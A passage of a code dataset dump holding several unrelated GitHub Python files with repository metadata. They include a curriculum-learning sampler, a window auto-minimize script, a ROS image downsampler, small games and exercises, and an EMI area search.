Returns:\n            The difficulty coefficient calculated by d_AtomAndBond.\n        \"\"\"\n        return self.mol.GetNumAtoms() + self.mol.GetNumBonds()\n\n    def calculate_sp3idx(self):\n        \"\"\"\n        Calculate the fraction of sp3 carbon atoms in the molecule.\n        Returns:\n            The difficulty coefficient calculated by d_Fsp3.\n        \"\"\"\n        n_carbon = 0\n        n_sp3ring = 0\n        for atom in self.mol.GetAtoms():\n            if atom.GetAtomicNum() == 6:\n                n_carbon += 1\n                if atom.GetTotalDegree() == 4:\n                    n_sp3ring += 1\n        if not n_carbon:\n            return 0\n        else:\n            return n_sp3ring / n_carbon\n\n    def calculate_chiral(self):\n        \"\"\"\n        Calculate the number of chiral centers of the molecule\n        for the calculation of d_MCE18.\n        \"\"\"\n        Chem.AssignStereochemistry(self.mol, flagPossibleStereoCenters=True)\n        return rdMolDescriptors.CalcNumAtomStereoCenters(self.mol)\n\n    def calculate_fsp3ring(self):\n        \"\"\"\n        Calculate the Fsp3 ratio over all the rings in the molecule\n        for the calculation of d_MCE18.\n        \"\"\"\n        ring_atoms = [i for ring in self.mol.GetRingInfo().AtomRings() for i in ring]\n        n_carbon = 0\n        n_sp3ring = 0\n        for atom_id in ring_atoms:\n            atom = self.mol.GetAtomWithIdx(atom_id)\n            if atom.GetAtomicNum() == 6:\n                n_carbon += 1\n                if atom.GetTotalDegree() == 4:\n                    n_sp3ring += 1\n        if not n_carbon:\n            return 0\n        else:\n            return n_sp3ring / n_carbon\n\n    def calculate_MCE18(self):\n        \"\"\"\n        Calculate the MCE18 score, which is the measure of the complexity.\n        Returns:\n            The difficulty coefficient calculated by d_MCE18.\n        \"\"\"\n        QINDEX = 3 + sum((atom.GetDegree() ** 2) / 2 - 2 for atom in self.mol.GetAtoms())\n        FSP3 = rdMolDescriptors.CalcFractionCSP3(self.mol)\n        AR = AllChem.CalcNumAromaticRings(self.mol)\n        SPIRO = rdMolDescriptors.CalcNumSpiroAtoms(self.mol)\n        NRING = rdMolDescriptors.CalcNumRings(self.mol)\n        FSP3RING = self.calculate_fsp3ring()\n        CHIRALC = self.calculate_chiral()\n        return QINDEX * (2 * FSP3RING / (1 + FSP3) + int(AR > 0) +\n                         int(AR < NRING) + int(CHIRALC > 0) + int(SPIRO > 0))\n\n    def calculate_LabelDistance(self):\n        \"\"\"\n        Calculate the L1 distance between the predicted value and the true label\n        in the train set, which is the measure of the complexity.\n        Returns:\n            The difficulty coefficient calculated by d_LabelDistance.\n        \"\"\"\n        if type(self.pred) == np.ndarray or type(self.pred) != np.float64:\n            # take the absolute difference so this is a true L1 distance\n            return np.abs(np.array(self.pred) - np.array(self.label)).mean(axis=0)\n        return abs(self.pred - self.label)\n\n\ndef diff_metric_get(args, diff_count):\n    \"\"\"\n    Get the normalized difficulty coefficients and the sorted order of the training set.\n    Args:\n        diff_count: The array of the difficulty coefficients of the training set.\n    Returns:\n        sort: A sort of training set based on its difficulty coefficients.\n        cdf: normalized difficulty coefficients.\n    \"\"\"\n    if args['diff_type'] == 'Joint':\n        diff_count = np.stack(diff_count)\n        cdf = []\n        weight = args['diff_weight']\n        count = 0\n        for i in range(len(diff_count[0])):\n            cdf.append(np.array([len(np.where(\n                diff_count[:, i] < count)[0]) / len(diff_count[:, i])\n                for count in diff_count[:, i]]))\n            # for ablation study to use\n            # cdf.append(np.array([(count - diff_count.min())\n            #                      / (diff_count.max() - diff_count.min())\n            #                      for count in diff_count[:, i]]))\n            count += 1\n        cdf = np.array(cdf).T\n        if args['diff_type'] == 'Joint':\n            cdf = np.array([weight * (0.3 * i[0] + 0.2 * i[1] + 0.5 * i[2]) +\n                            (1 - weight) * i[3]\n                            for i in cdf])\n            cdf = np.array([(i - cdf.min()) /\n                            (cdf.max() - cdf.min()) for i in cdf])\n        else:\n            cdf = np.array([0.3 * i[0] + 0.2 * i[1] + 0.5 * i[2]\n                            for i in cdf])\n            cdf = np.array([(i - cdf.min()) 
/\n                            (cdf.max() - cdf.min()) for i in cdf])\n        sort = cdf.argsort()\n        return sort, cdf\n    elif args['diff_type'] == 'Two_stage':\n        diff_count = np.stack(diff_count)\n        cdf = []\n        weight = args['diff_weight']\n        count = 0\n        for i in range(len(diff_count[0])):\n            cdf.append(np.array([len(np.where(\n                diff_count[:, i] < count)[0]) / len(diff_count[:, i])\n                for count in diff_count[:, i]]))\n            # for ablation study to use\n            # cdf.append(np.array([(count - diff_count.min())\n            #                      / (diff_count.max() - diff_count.min())\n            #                      for count in diff_count[:, i]]))\n\n            count += 1\n        cdf = np.array(cdf).T\n        cdf1 = np.array([0.0 * i[0] + 0.0 * i[1] + 1.0 * i[2]\n                         for i in cdf])\n        cdf2 = cdf[:, -1]\n        sort1 = cdf1.argsort()\n        sort2 = cdf2.argsort()\n        return [sort1, sort2], [cdf1, cdf2]\n    else:\n        sort = diff_count.argsort()\n        cdf = np.array([len(np.where(diff_count < count)[0]) /\n                        len(diff_count) for count in diff_count])\n        # for ablation study to use\n        # cdf = np.array([(count - diff_count.min())\n        #                 / (diff_count.max() - diff_count.min())\n        #                 for count in diff_count])\n        return sort, cdf\n\n\ndef competence_func(t_step: int, t_total: int, c0: float,\n                    c_type: float, threshold=1.0):\n    \"\"\"\n    The competence-based training scheduler.\n    Args:\n        t_step: The current training iteration t.\n        t_total: Total training iterations T.\n        c0: Initial competence value.\n        c_type: The power of the number in competence function.\n        threshold: only for ablation study.\n    Returns:\n        Current competence value.\n    \"\"\"\n    competence = pow((1 - c0 ** c_type) * (t_step / t_total) + c0 ** c_type, 1 / c_type)\n    if competence > threshold:\n        competence = threshold\n    return competence\n\n\nclass CurrSampler(Sampler):\n    \"\"\"\n    The sampler based on the CurrMG.\n    \"\"\"\n\n    def __init__(self, args, diff_feat):\n        self.args = args\n        self.diff_feat = diff_feat\n\n    def __iter__(self):\n        self.indices, self.cdf_dis = diff_metric_get(self.args, self.diff_feat)\n        return iter([[self.indices, self.cdf_dis]])\n\n    def __len__(self):\n        return len(self.indices)\n\n\nclass CurrBatchSampler(Sampler):\n    \"\"\"\n    The batch sampler for the data sample in CurrMG.\n    \"\"\"\n\n    def __init__(self, sampler, batch_size, t_total,\n                 c_type, sample_type, threshold=1.0):\n        \"\"\"\n        Args:\n            sampler: torch.utils.data.Sampler,\n                     The defined Sampler for the data sample; it yields the\n                     sorted indices and the normalized difficulty scores.\n            batch_size: Batch size.\n            t_total: Total training iterations T.\n            c_type: The power of the number in competence function.\n            sample_type: 'Random' or 'Padding-like' sampling type\n                         ('Random' is used in our manuscript).\n            threshold: only for ablation study.\n        \"\"\"\n        self.sampler = sampler\n        self.batch_size = batch_size\n        self.t_total = t_total\n        self.c_type = c_type\n        self.sample_type = sample_type\n        self.threshold = threshold\n\n    def __iter__(self):\n        for sample in self.sampler:\n            self.indices = np.array(sample[0])\n            self.cdf = np.array(sample[1])\n\n            # for ablation study to use\n            # self.c0 = 1\n\n            for t in range(self.t_total):\n                sample_count = np.zeros(len(self.indices))\n                if len(self.indices) > 2:\n                    self.c0 = self.cdf[np.argpartition(self.cdf, self.batch_size - 1)[self.batch_size]]\n                    c = competence_func(t, self.t_total, self.c0, self.c_type, self.threshold)\n                    sample_pool = list(np.where(self.cdf <= c)[0])\n                    if self.sample_type == 'Random':\n                        sample_all = Random_batch(sample_pool,\n                                                  self.batch_size)\n                    elif self.sample_type == 'Padding-like':\n                        sample_all, sample_count = PaddingLike_batch(sample_pool,\n                                                                     sample_count,\n                                                                     self.batch_size)\n                elif len(self.indices) == 2:\n                    if t < int(self.t_total * 0.6):\n                        
self.c0 = self.cdf[0][np.argpartition(self.cdf[0], self.batch_size - 1)[self.batch_size]]\n                        c = competence_func(t, int(self.t_total * 0.6),\n                                            self.c0, self.c_type, self.threshold)\n                        sample_pool = list(np.where(self.cdf[0] <= c)[0])\n                        sample_all = Random_batch(sample_pool,\n                                                  self.batch_size)\n                    else:\n                        self.c0 = self.cdf[1][np.argpartition(self.cdf[1], self.batch_size - 1)[self.batch_size]]\n                        c = competence_func(t, int(self.t_total * 0.4),\n                                            self.c0, self.c_type, self.threshold)\n                        sample_pool = list(np.where(self.cdf[1] <= c)[0])\n                        sample_all = Random_batch(sample_pool,\n                                                  self.batch_size)\n                yield sample_all.tolist()\n\n    def __len__(self):\n        return len(self.indices)\n\n\ndef Random_batch(sample_pool, batch_size):\n    \"\"\"\n    The 'Random' sampling type.\n    \"\"\"\n    return np.random.choice(sample_pool, size=batch_size, replace=False)\n\n\ndef PaddingLike_batch(sample_pool, sample_count, batch_size):\n    \"\"\"\n    The 'Padding-like' sampling type.\n    \"\"\"\n    sample_all = np.argpartition(sample_count[sample_pool],\n                                 batch_size - 1)[:batch_size]\n    sample_count[sample_all] += 1\n    return sample_all, sample_count\n","repo_name":"gu-yaowen/CurrMG","sub_path":"train_sampler.py","file_name":"train_sampler.py","file_ext":"py","file_size_in_byte":16157,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"71045989851","text":"#!/usr/bin/env python3\nimport subprocess\nimport sys\nimport time\n\ndef getwindowlist():\n    # get windowlist\n    try:\n        return [\n            l.split()[0] for l in \\\n            subprocess.check_output([\"wmctrl\", \"-l\"]).decode(\"utf-8\")\\\n            .splitlines()\n        ]\n    except subprocess.CalledProcessError:\n        pass\n\ndef getactive():\n    # get active window, convert to hex for compatibility with wmctrl\n    wid = str(hex(int(\n        subprocess.check_output([\"xdotool\", \"getactivewindow\"])\\\n        .decode(\"utf-8\"))))\n    return wid[:2]+str((10-len(wid))*\"0\")+wid[2:]\n\n# round down to a multiple of 2 seconds; floor division keeps it an int so the match stays exact\nminitime = (int(sys.argv[1])//2)*2\n\nwlist1 = []\ntimerlist = []\n\nwhile True:\n    time.sleep(2)\n    wlist2 = getwindowlist()\n    if wlist2:\n        # clean up previous windowlist; remove non-existent windows\n        try:\n            timerlist = [\n                wcount for wcount in timerlist if wcount[0] in wlist2\n            ]\n        except IndexError:\n            pass\n        for w in wlist2:\n            # add new windows, zero record\n            if w not in wlist1:\n                timerlist.append([w, 0])\n        # add two to account(s)\n        for item in timerlist:\n            item[1] += 2\n        active = getactive()\n        for w in timerlist:\n            # minimize windows that reach the threshold\n            if w[1] == minitime:\n                subprocess.Popen([\"xdotool\", \"windowminimize\", w[0]])\n            # reset account of active window to zero\n            w[1] = 0 if w[0] == active else w[1]\n        wlist1 = wlist2\n","repo_name":"blay/dotfiles","sub_path":"shell/minimize_timer.py","file_name":"minimize_timer.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"34301256020","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import TwistStamped\nfrom cv_bridge import CvBridge\n\ndef gotrgb(rgbimage):\n\timagergb = bridge.imgmsg_to_cv2(rgbimage, desired_encoding=\"bgr8\")\n\timagergb = imagergb[::2,::2]\n\trgb_pub.publish( bridge.cv2_to_imgmsg(imagergb) )\n\ndef gotdepth(depthimage):\n\timagedepth = bridge.imgmsg_to_cv2(depthimage, desired_encoding=\"passthrough\")\n\timagedepth2 = imagedepth[::2,::2]\n\t\n\timagedepth2 = 
np.where(np.isnan(imagedepth2), np.ma.array(imagedepth2, mask = np.isnan(imagedepth2)).mean(axis=0), imagedepth2)\t\n\tfor i in range(len(imagedepth2)):\n\t\tfor j in range(len(imagedepth2[1])):\n\t\t\tif (imagedepth2[i,j] == 0):\n\t\t\t\timagedepth2[i,j] = np.amax(imagedepth2)\t\n\n\t\t\timagedepth2[i,j] = imagedepth2[i,j]*25.951\n\t\t\tif (imagedepth2[i,j] > 255):\n\t\t\t\timagedepth2[i,j] = 255\n\n\tdepth_pub.publish( bridge.cv2_to_imgmsg(imagedepth2) )\n\n\nif __name__ == '__main__':\n\trgb_sub = rospy.Subscriber('/camera/rgb/image_raw', Image, gotrgb)\n\tdepth_sub = rospy.Subscriber('/camera/depth_registered/image_raw', Image, gotdepth)\n\tbridge = CvBridge()\n\t\n\trgb_pub = rospy.Publisher('/camera/rgb/image_raw_downsampled', Image, queue_size=1)\n\tdepth_pub = rospy.Publisher('/camera/depth_registered/image_raw_downsampled', Image, queue_size=1)\n\trospy.init_node('image_downsampler', anonymous=True)\n\trospy.spin()\n","repo_name":"SunnyDeshpande/Neuro-Navigation","sub_path":"image_downsampler.py","file_name":"image_downsampler.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42847068595","text":"import turtle\r\nimport pandas\r\nfrom show_state import ShowState\r\n\r\n\r\ndef return_cordinates(df_name, answer_state):\r\n \"\"\"Returns (x, y) position of state on the screen\"\"\"\r\n state = df_name[df_name[\"state\"] == answer_state]\r\n state_x = int(state[\"x\"])\r\n state_y = int(state[\"y\"])\r\n return (state_x, state_y)\r\n\r\nscreen = turtle.Screen()\r\nscreen.title(\"U.S. States Game\")\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\n# get coordinates on click\r\n# import get_mouse_click_cor\r\n# turtle.onscreenclick(get_mouse_click_cor.get_mouse_click_coor())\r\ndata = pandas.read_csv(\"50_states.csv\")\r\nstates_list = data[\"state\"].to_list()\r\ncorrect_guesses = []\r\n\r\n# MAIN\r\nwhile len(correct_guesses) < 50:\r\n answer_state = (screen.textinput(title=f\"{len(correct_guesses)}/50 Guess the State\", prompt=\"Type the name of State\")).title()\r\n if answer_state == \"Exit\":\r\n break\r\n if answer_state in states_list:\r\n correct_guesses.append(answer_state)\r\n position = return_cordinates(df_name=data, answer_state=answer_state)\r\n show_state = ShowState(answer_state, position)\r\n\r\n# not_guessed = list(set(states_list) - set(correct_guesses))\r\n# solution from next lesson day 26 exercise 4\r\nnot_guessed = [not_guessed_state for not_guessed_state in states_list if not_guessed_state not in correct_guesses]\r\nto_learn_data = pandas.DataFrame(not_guessed)\r\nto_learn_data.to_csv(\"a.csv\")\r\n\r\n","repo_name":"hubs0n93/100_days_of_code_py","sub_path":"day-25-27_csv_list_comprehension_GUI/25/US_state_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33925764299","text":"import matplotlib.pyplot as plt\n\nlabels= 'Delhi','Patna','Gwalior','Raipur'\nsizes = [45,30,15,10]\nexplode =(0,0.1,0,0)\n\nfig1, ax1 = plt.subplots()\nax1.pie(sizes, explode=explode,labels=labels, autopct =\"% 1.1f %%\",shadow=True,startangle=90)\nax1.axis('equal')\nplt.title(\"Pollution rank among 
cities\")\nplt.show()","repo_name":"radhikascs/python-data-science-examples","sub_path":"activity6.py","file_name":"activity6.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10438209526","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n    path('get-send-mails', views.CreateAndGetPosts.as_view()),\n    path('get-sent-mails', views.get_sent_mails),\n    path('get-replies/', views.get_replies),\n    path('mail-detail/', views.MailDetail.as_view()),\n    path('delete-mail/', views.DeleteMail.as_view()),\n]","repo_name":"amirrzw/made_in_lobby_email","sub_path":"mails/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27127235840","text":"'''\nDesigner notes:\n\nThe function performs a search algorithm on the \"condensed_data\" array (target \nroom) to find the coordinates of the rectangular area (with length \"l\", width \n\"w\", and height \"h\") that has the lowest average EMI (electromagnetic \ninterference) value and meets the EMI requirement specified by the device \nspecification (EMI_max).\n\nTo do this, the function first performs a data preprocessing step on the \n\"condensed_data\" array to generate two new arrays: \"sum_preprocess_list\" and \n\"detection_preprocess_list\". These arrays are used to quickly calculate the EMI\nsum and the number of points that do not meet the EMI requirement for any \nrectangular area of the condensed_data array.\n\nThe function then iterates through the \"condensed_data\" array to check each \nrectangular area with length \"l\", width \"w\" and height \"h\". For each \nrectangular area, the function uses the \"sum_preprocess_list\" to quickly \ncalculate the average EMI in the current rectangular area and uses the \n\"detection_preprocess_list\" array to check whether the current rectangular area \nmeets the EMI requirement. If the area meets the EMI requirement, the function \ncalculates the average EMI value for that area and checks whether it ranks \namong the current lowest average EMI values. If it does, the function updates \nthe ranked lowest average EMI values and records the coordinates of the \ncurrent rectangular area.\n\nFinally, the function returns the three lowest average EMI values and the \ncoordinates of these areas.\n\n\nInput clarification:\ncondensed_data: a 3D array with EMI measurements of the target room.\nl: an integer that shows the length of the wanted rectangular area.\nw: an integer that shows the width of the wanted rectangular area.\nh: an integer that shows the height of the wanted rectangular area.\nEMI_max: the maximum EMI allowed to safely operate the device.\n\nOutput clarification:\nThe function will return a tuple containing least_avg_val_list and least_avg_coord.\nleast_avg_val_list: a list of the three least average EMI values in the target room\nleast_avg_coord: a list of the three ranked least-average-EMI locations \nEach component in the list is a tuple containing 6 integers. 
\n- The first three integers show the coordinates of the top-left-front corner of the \n  wanted rectangular area.\n- The last three integers show the coordinates of the bottom-right-back corner\n  of the wanted rectangular area.\n'''\nimport math\nimport numpy as np\n\nfrom virtualscanner.EMI_Scanner.emi_measurement_class import emi_measurement\n\n# this algorithm uses 3D prefix sums\ndef search_algorithm (condensed_data, l, w, h, EMI_max):\n    least_avg_val_list = [math.inf, math.inf, math.inf]\n    least_avg_coord = [(-1,-1,-1,-1,-1,-1),\n                       (-1,-1,-1,-1,-1,-1),\n                       (-1,-1,-1,-1,-1,-1)]\n    total_num_points = l * w * h\n\n    # Preprocessing the data\n    # list to calculate the sum\n    sum_preprocess_list = []\n    # list to detect EMI requirement\n    detection_preprocess_list = []\n\n    # define the two lists\n    for i in range (len(condensed_data)):\n        temp_one_layer_array_1 = []\n        temp_one_layer_array_2 = []\n        for j in range (len(condensed_data[i])):\n            temp_list_1 = []\n            temp_list_2 = []\n            for k in range (len(condensed_data[i][j])):\n                temp_list_1.append(None)\n                temp_list_2.append(None)\n            temp_one_layer_array_1.append(temp_list_1)\n            temp_one_layer_array_2.append(temp_list_2)\n        sum_preprocess_list.append(temp_one_layer_array_1)\n        detection_preprocess_list.append(temp_one_layer_array_2)\n\n    for i in range (len(condensed_data)):\n        for j in range (len(condensed_data[i])):\n            for k in range (len(condensed_data[i][j])):\n                s1 = sum_preprocess_list[i-1][j-1][k-1]\n                s2 = sum_preprocess_list[i-1][j-1][k]\n                s3 = sum_preprocess_list[i-1][j][k-1]\n                s4 = sum_preprocess_list[i-1][j][k]\n                s5 = sum_preprocess_list[i][j-1][k-1]\n                s6 = sum_preprocess_list[i][j-1][k]\n                s7 = sum_preprocess_list[i][j][k-1]\n                s8 = condensed_data[i][j][k]\n                \n                d1 = detection_preprocess_list[i-1][j-1][k-1]\n                d2 = detection_preprocess_list[i-1][j-1][k]\n                d3 = detection_preprocess_list[i-1][j][k-1]\n                d4 = detection_preprocess_list[i-1][j][k]\n                d5 = detection_preprocess_list[i][j-1][k-1]\n                d6 = detection_preprocess_list[i][j-1][k]\n                d7 = detection_preprocess_list[i][j][k-1]\n                d8 = 0\n                if condensed_data[i][j][k].get_magnitude() > EMI_max: \n                    d8 = 1\n                \n                if i == 0: \n                    s1 = s2 = s3 = s4 = emi_measurement(0,0,0)\n                    d1 = d2 = d3 = d4 = 0\n                if j == 0: \n                    s1 = s2 = s5 = s6 = emi_measurement(0,0,0)\n                    d1 = d2 = d5 = d6 = 0\n                if k == 0: \n                    s1 = s3 = s5 = s7 = emi_measurement(0,0,0)\n                    d1 = d3 = d5 = d7 = 0\n                \n                sum_preprocess_list[i][j][k] = (s8 + s1 - s2 - s3\n                                                + s4 - s5 + s6 + s7)\n\n                # determine if the current point meets the EMI requirement.\n                \n                detection_preprocess_list[i][j][k] = (d8 + d1 - d2 - d3 + d4 \n                                                      - d5 + d6 + d7)\n    \n    # Find least_average_EMI_position\n    iteration = 0\n    while (iteration < 2):\n        for i in range (len(condensed_data)): \n            for j in range (len(condensed_data[0])):\n                for k in range (len(condensed_data[0][0])):\n                    if not (i >= l - 1 and j >= w - 1 and k >= h - 1): continue \n                    s1 = sum_preprocess_list[i-l][j-w][k-h]\n                    s2 = sum_preprocess_list[i-l][j-w][k]\n                    s3 = sum_preprocess_list[i-l][j][k-h]\n                    s4 = sum_preprocess_list[i-l][j][k]\n                    s5 = sum_preprocess_list[i][j-w][k-h]\n                    s6 = sum_preprocess_list[i][j-w][k]\n                    s7 = sum_preprocess_list[i][j][k-h]\n                    s8 = sum_preprocess_list[i][j][k]\n                    \n                    d1 = detection_preprocess_list[i-l][j-w][k-h]\n                    d2 = detection_preprocess_list[i-l][j-w][k]\n                    d3 = detection_preprocess_list[i-l][j][k-h]\n                    d4 = detection_preprocess_list[i-l][j][k]\n                    d5 = detection_preprocess_list[i][j-w][k-h]\n                    d6 = detection_preprocess_list[i][j-w][k]\n                    d7 = detection_preprocess_list[i][j][k-h]\n                    d8 = detection_preprocess_list[i][j][k]\n                    \n                    if i < l: \n                        s1 = 
s2 = s3 = s4 = emi_measurement(0,0,0)\n                        d1 = d2 = d3 = d4 = 0\n                    if j < w: \n                        s1 = s2 = s5 = s6 = emi_measurement(0,0,0)\n                        d1 = d2 = d5 = d6 = 0\n                    if k < h: \n                        s1 = s3 = s5 = s7 = emi_measurement(0,0,0)\n                        d1 = d3 = d5 = d7 = 0\n\n                    current_detection = d8 - d1 + d2 + d3 - d4 + d5 - d6 - d7\n                    \n                    # Calculate the average EMI if necessary\n                    if not current_detection:\n                        # Calculate current average\n                        c_a = (s8 - s1 + s2 + s3 - s4 + s5 \n                               - s6 - s7) / total_num_points\n                        for m in range (len(least_avg_val_list)):\n                            if (c_a.get_magnitude() < least_avg_val_list[m]):\n                                # insert into the ranked top-3 lists and drop the\n                                # last entry, so lower-ranked results shift down\n                                # instead of being overwritten\n                                least_avg_val_list.insert(m, c_a.get_magnitude())\n                                least_avg_coord.insert(m, (i - l + 1, j - w + 1,\n                                                           k - h + 1, i, j, k))\n                                least_avg_val_list.pop()\n                                least_avg_coord.pop()\n                                break\n        # flip length and width\n        temp = w\n        w = l\n        l = temp\n        iteration += 1\n    \n    return (least_avg_val_list, least_avg_coord) \n\n","repo_name":"qihenry/test4","sub_path":"virtualscanner/EMI_Scanner/least_emi_algorithm.py","file_name":"least_emi_algorithm.py","file_ext":"py","file_size_in_byte":8298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43405082197","text":"import pygame, OpenGL, math, random\nfrom pygame.locals import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom time import time\n\ngravity = 80\n\nclass Particle:\n    def __init__(self, x, y, ttl, color):\n        self.x = x\n        self.y = y\n        self.z = 0\n        self.ttl = ttl\n        self.speedX = random.randint(-85, 85)\n        self.speedY = random.randint(250, 300)\n        self.timeAlive = 0\n        self.startTime = time() + random.randint(0, 400)/100\n        self.color = color\n    \n    def getPosition(self):\n        global gravity\n        x = self.x + self.speedX * self.timeAlive\n        y = self.y - self.speedY * self.timeAlive + gravity * self.timeAlive * self.timeAlive\n        return x, y\n    \n    def update(self, t):\n        self.timeAlive = time() - self.startTime\n    \n    def isAlive(self):\n        return self.timeAlive < self.ttl\n    \nclass ParticleSystem:\n    def __init__(self, x, y, z, n, ttl, color):\n        self.x = x\n        self.y = y\n        self.z = z\n        self.particles = [Particle(x, y, ttl, color) for _ in range(n)]\n    \n    def getParticles(self):\n        return self.particles\n    \ndef resetView():\n    glLoadIdentity()\n    gluPerspective(45, 1, 0.05, 100)\n    glTranslatef(0,0,-5)\n    glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n\n#---------------------------------------------------- \n    \npygame.init()\nscreen = pygame.display.set_mode((600,600))\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\nsurfaceSize = (50, 50)\n\n#Circle particle\ncircle = pygame.Surface(surfaceSize)\ncircle.set_colorkey(BLACK)\n\n#Particle texture\nimage = pygame.Surface(surfaceSize, pygame.SRCALPHA, 32)\nimage = image.convert_alpha()\ntexture = pygame.image.load(\"vulcano.png\").convert_alpha()\ntexture = pygame.transform.scale(texture,(100, 100))\ntexture_rect = texture.get_rect()\ntexture_rect.center = (325, 450)\nscreen.blit(texture, texture_rect)\n\nparticleSize = 6\nttl = 3\nnumberOfParticles = 1000\nsysPos = (300, 400, 0)\n\nparticleSystem = ParticleSystem(sysPos[0], sysPos[1], sysPos[2], numberOfParticles, ttl, WHITE)\n\nwhile True:\n    now = time()\n    screen.fill(WHITE)\n    screen.blit(texture,texture_rect)\n    resetView()\n    \n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            pygame.quit()\n            raise SystemExit # stop the loop; drawing after quit would crash\n    \n    for i in range(numberOfParticles):\n        particle = particleSystem.getParticles()[i]\n        \n        if (particle.startTime < now):\n            particle.update(time())\n        \n        if (particle.isAlive()):\n            x, y = particle.getPosition()\n            \n            color = particle.color\n            if (color[2] > 2):\n                color = (color[0], 
color[1], color[2]-3)\n            if (color[1] > 1):\n                color = (color[0], color[1]-2, color[2])\n            if (color[0] > 0):\n                color = (color[0]-1, color[1], color[2])\n            particle.color = color\n            \n            #screen.blit(texture, (x,y))\n            pygame.draw.circle(circle, particle.color, (25, 25), particleSize)\n            screen.blit(circle, (x, y))\n        else:\n            particleSystem.particles[i] = Particle(sysPos[0], sysPos[1], ttl, WHITE)\n\n    pygame.display.flip()\n    pygame.time.wait(10)\n    \n    \n    \n    \n    \n","repo_name":"connectthefranky/RacunalnaGrafinka","sub_path":"lab2/particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34036675682","text":"#%%\nnum = list(map(int, input('Enter the values: ').split()))\nnum\n\n\n\n#%%\ndef arithmetic_sequence(target_num:int):\n    import numpy as np\n    \n    for num in range(1, target_num+1):\n        num_list = np.arange(1, num)\n        list_sum = sum(num_list[:])\n\n        if list_sum == target_num:\n            return True\n        if list_sum < target_num:\n            continue\n        else:\n            return False\n\nprint(arithmetic_sequence(10))  # example argument; the original call omitted the required target_num\n\n\n\n\n\n\n#%%\n\n\n\n","repo_name":"CatsSaveTheWorld/TIL","sub_path":"algorithms/baekjoon/10818_최대최소/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29934570767","text":"\ndef split(txt):\n    # split a parenthesis string into its top-level balanced groups\n    result = []\n    open_count = 0\n    closed_count = 0\n    \n    subset = \"\"\n    \n    for char in txt:\n        if char == \"(\":\n            subset += \"(\"\n            open_count += 1\n        if char == \")\":\n            subset += \")\"\n            closed_count += 1\n            if closed_count == open_count:\n                result.append(subset)\n                subset = \"\"\n    \n    return result\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"Fpymv2HieqEd7ptAq_11.py","file_name":"Fpymv2HieqEd7ptAq_11.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9127587637","text":"# Parentheses conversion\n# Check whether the string is a correct (balanced) parenthesis string\ndef isRight(p):\n    stack = []\n    for i in p:\n        if i == \"(\":\n            stack.append(i)\n        else:\n            if not stack: return False\n            stack.pop()\n    if not stack: return True\n    return False\ndef solution(p):\n    if p == '': return ''\n    # 2\n    left = 0\n    right = 0\n    u = ''\n    v = ''\n    for i in range(len(p)):\n        if p[i] == '(':\n            left += 1\n        else:\n            right += 1\n        if left == right:\n            u = p[:i+1]\n            v = p[i+1:]\n            break\n    if isRight(u):\n        return u + solution(v)\n    else:\n        temp = '('\n        temp += solution(v)\n        temp += ')'\n        for i in u[1:-1]:\n            if i == '(':\n                temp += ')'\n            elif i == ')':\n                temp += '('\n        return temp\nprint(solution(\"()))((()\"))","repo_name":"mog-hi/BOJ_Python","sub_path":"Programmers/kakao/60058.py","file_name":"60058.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"151474678","text":"import cv2\nimport numpy as np\n\n# Create video capture object\n# https://www.youtube.com/watch?v=fe9-qz3jsgs (freeway1.mp4)\ncap = cv2.VideoCapture(\"freeway1.mp4\")\nker = None\nbackground = cv2.createBackgroundSubtractorMOG2(detectShadows = True)\n\nwhile True:\n    # Analyze frame by frame\n    _, first_frame = cap.read()\n    _, last_frame = cap.read()\n\n    surface_mask = background.apply(first_frame)\n    _, surface_mask = cv2.threshold(surface_mask, 250, 255, cv2.THRESH_BINARY)\n    surface_mask = cv2.erode(surface_mask, ker, iterations = 1)\n    surface_mask = cv2.dilate(surface_mask, ker, iterations = 2)\n    \n    # 
